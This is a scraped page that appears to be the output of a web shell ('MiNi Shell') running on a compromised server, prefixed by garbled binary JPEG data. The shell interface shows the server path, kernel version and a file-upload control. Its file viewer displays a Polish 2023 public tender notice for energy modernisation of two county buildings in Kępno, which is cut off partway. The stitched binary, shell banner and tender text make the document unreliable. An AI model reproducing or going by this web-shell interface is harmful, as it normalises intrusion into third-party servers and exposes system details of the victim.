JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230621/0026893701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Kompleksowa modernizacja energetyczna dwóch budynków użyteczności publicznej stanowiących własność Powiatu Kępińskiego ( budynek PCPR w Kępnie i budynek główny Z S P Nr 2 w Kępnie ) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kępiński</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250854671</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kępno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0 62 7828900</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0 62 7828901</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@powiatkepno.pl,</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.powiatkepno.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa modernizacja energetyczna dwóch budynków użyteczności publicznej stanowiących własność Powiatu Kępińskiego ( budynek PCPR w Kępnie i budynek główny Z S P Nr 2 w Kępnie ) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0e5d25bc-0ffa-11ee-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00268937</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00048126/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Kompleksowa modernizacja energetyczna budynków użyteczności publicznej Powiatu Kępińskiego (budynek PCPR i budynek główny ZSP nr 2 w Kępnie)WRPO</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiotowe zamówienie publiczne realizowane jest z Wojewódzkiego Regionalnego Programu Operacyjnego na lata 2014-2020 w ramach Europejskiego Funduszu Rozwoju Regionalnego Os. Priorytetowa 3 Energia, Działanie 3.2. Poprawa efektywności energetycznej w sektorze publicznym i mieszkaniowym, Podziałanie 3.2.1. Kompleksowa modernizacja energetyczna budynków użyteczności publicznej </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> bip.powiatkepno.pl oraz https://platformazakupowa.pl/pn/powiatkepno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiatkepno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej.<br/>Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/> 2. Ofertę, oświadczenia, o których mowa w art.125 ust. 1 p.z.p podmiotowe środki dowodowe ,pełnomocnictwa, zobowiązanie podmiotu udostepniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych o formatach danych. Ofertę a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym .<br/>3. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji Wykonawcy przekazują:<br/>Elektronicznie na adres e-mail: sekretariat@powiatkepno.pl lub za pośrednictwem Platformy znajdującej się pod adresem: https://platformazakupowa.pl/pn/powiatkepno <br/>4. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu (godziny pracy Zamawiającego (od godz.7:30 do 15:30 w dni robocze). Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>6.Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl pod adresem : https://platformazakupowa.pl/pn/powiatkepno .5) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6) Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. https://platformazakupowa.pl/pn/powiatkepno</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W zakresie niniejszego postępowania administratorem danych osobowych obowiązanym do spełnienia obowiązku informacyjnego z art. 13 RODO1) będzie w szczególności: <br/>Zamawiający - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności: <br/>•	wykonawcy będącego osobą fizyczną, <br/>•	wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą, <br/>•	pełnomocnika wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie), <br/>•	członka organu zarządzającego wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK), <br/>•	osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego; <br/>Wykonawca - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności: <br/>•	osoby fizycznej skierowanej do realizacji zamówienia, <br/>•	podwykonawcy/podmiotu trzeciego będącego osobą fizyczną, <br/>•	podwykonawcy/podmiotu trzeciego będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą, <br/>•	pełnomocnika podwykonawcy/podmiotu trzeciego będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie), <br/>•	członka organu zarządzającego podwykonawcy/podmiotu trzeciego, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK); <br/>Podwykonawca/podmiot trzeci - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. <br/>Dotyczy to w szczególności osoby fizycznej skierowanej do realizacji zamówienia. <br/>Zgodnie z art.13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w spra-wie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	administratorem Pani/Pana danych osobowych jest: Starosta Powiatu Kępińskiego <br/>•	jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych, a także przysługujących Pani/Panu praw, może się Pani/Pan skontaktować z Inspektorem Ochrony Danych Osobowych tel. +48 62 78 28 982, 501 646 476 * <br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. Kompleksowa modernizacja energetyczna dwóch budynków użyteczności publicznej stanowiących własność Powiatu Kępińskiego ( budynek Powiatowego Centrum Pomocy Rodzinie w Kępnie i budynek główny Zespołu Szkół Ponadpodstawowych Nr 2 w Kępnie ) - Części/ Zadań- 8 <br/>• prowadzonym w trybie podstawowym bez negocjacji , <br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.74 ustawy pzp. ”, <br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art.78 ust.1 Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp, <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.22 RODO, <br/>•	posiada Pani/Pan: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, <br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **, pozostałe informacje określone w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AB.272.11.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część/ Zadanie Nr 1 Wykonanie termomodernizacji budynku Powiatowego Centrum Pomocy Rodzinie w Kępnie ul. Sienkiewicza 26 – polegającej na:<br/>1) Modernizacja polegająca na ociepleniu ścian zewnętrznych styropianem grafitowym o gr. 15 cm( lambda=0,032W/mk) Całkowita powierzchnia do ocieplenia to 875,64 m2. W ramach zadania przewidziano również wykonanie prac przygotowawczych i odtworzeniowych ,przekładki istniejących instalacji (w przypadku instalacji odgromowej konieczne jest dostosowanie długości przewodów oraz elementów montażowych do grubości instalacji termicznej). ,<br/>2) Modernizacja stropu pod nieogrzewanym poddaszem polegająca na dociepleniu wełną mineralną o gr. 8cm- powierzchnia do ocieplenia 177,24 m2. Materiał izolacyjny o współczynniku lambda =0,032 W/mk. W ramach zadania przewidziano montaż płyt gipsowo-kartonowych, prace przygotowawcze i odtworzeniowe. <br/>3)Modernizacja skosów polegająca na dociepleniu wełną mineralną o gr. 8 cm, powierzchnia do ocieplenia 284,03. Materiał izolacyjny o współczynniku lambda =0,032 W/mk. W ramach zadania przewidziano również montaż płyt gipsowo- kartonowych, prace przygotowawcze i odtworzeniowe ,<br/>4)Płukanie instalacji i dostosowanie nastaw głowic termoregulacyjnych do zmniejszonego zapotrzebowania na ciepło<br/>5) Modernizacja oświetlenia na energooszczędne zgodnie z zapisami załącznika nr 9 do audytu przewidziano wymianę oświetlenia na energooszczędne. <br/>Zakres robót: Roboty remontowe ,Termomodernizacja roboty zewnętrzne, Ocieplenie dachu, Roboty budowlane na poddaszu <br/>Instalacja centralnego ogrzewania, Instalacja co, Instalacje elektryczne, Wymiana opraw na energooszczędne, II piętro- wykonanie robót elektrycznych, Roboty malarskie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert<br/><br/>Oferty będą oceniane w następujący sposób:<br/>1) cena oferty (brutto) Waga 60 % <br/> A<br/>	C = *100 pkt x 60%<br/> X<br/>gdzie:<br/> C – liczba punktów oferty<br/>	A – najniższa cena brutto ze złożonych ofert<br/> X – cena ocenianej oferty brutto<br/>2) Okres gwarancji jakości – waga 40%. Wykonawca może otrzymać maksymalnie 20 punktów i tak:<br/>Za okres gwarancji obejmujący 36 – miesięcy - 0 pkt<br/>Za okres gwarancji obejmujący 42 – miesięcy - 10 pkt<br/>Za okres gwarancji obejmujący 48 – miesięcy - 20 pkt<br/>Za okres gwarancji obejmujący 54 – miesięcy - 30 pkt<br/>Za okres gwarancji obejmujący 60 – miesięcy – 40 pkt<br/> <br/>Liczba punktów wyliczona zgodnie ze wzorem: P= C+G <br/>gdzie:<br/>P- suma punktów wg przyjętych kryteriów <br/>C- liczba punków za kryterium cena<br/>G- liczba punktów za kryterium okres gwarancji <br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu<br/><br/>Oferta na każdą cześć oceniana będzie odrębnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część/Zadanie Nr 2 Wykonanie kotłowni w budynku Powiatowego Centrum Pomocy Rodzinie w Kępnie ul. Sienkiewicza 26 zakres robót:<br/>Wykonanie instalacji centralnego ogrzewania, Wykonanie instalacji gazowej, Wykonanie instalacji rurociągu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331100-7 - Instalowanie centralnego ogrzewania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert<br/><br/>Oferty będą oceniane w następujący sposób:<br/>1) cena oferty (brutto) Waga 60 % <br/> A<br/>	C = *100 pkt x 60%<br/> X<br/>gdzie:<br/> C – liczba punktów oferty<br/>	A – najniższa cena brutto ze złożonych ofert<br/> X – cena ocenianej oferty brutto<br/>2) Okres gwarancji jakości – waga 40%. Wykonawca może otrzymać maksymalnie 20 punktów i tak:<br/>Za okres gwarancji obejmujący 36 – miesięcy - 0 pkt<br/>Za okres gwarancji obejmujący 42 – miesięcy - 10 pkt<br/>Za okres gwarancji obejmujący 48 – miesięcy - 20 pkt<br/>Za okres gwarancji obejmujący 54 – miesięcy - 30 pkt<br/>Za okres gwarancji obejmujący 60 – miesięcy – 40 pkt<br/> <br/>Liczba punktów wyliczona zgodnie ze wzorem: P= C+G <br/>gdzie:<br/>P- suma punktów wg przyjętych kryteriów <br/>C- liczba punków za kryterium cena<br/>G- liczba punktów za kryterium okres gwarancji <br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu<br/><br/>Oferta na każdą cześć oceniana będzie odrębnie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część/Zadanie Nr 3 Wykonanie instalacji klimatyzacji w budynku Powiatowego Centrum Pomocy Rodzinie w Kępnie ul. Sienkiewicza26 zakres robót:<br/>Wykonanie: klimatyzacji, kanalizacji odpływ skroplin, instalacji elektrycznej oraz robót malarskich. </p> <h3 class="mb-0">4.2.6.) 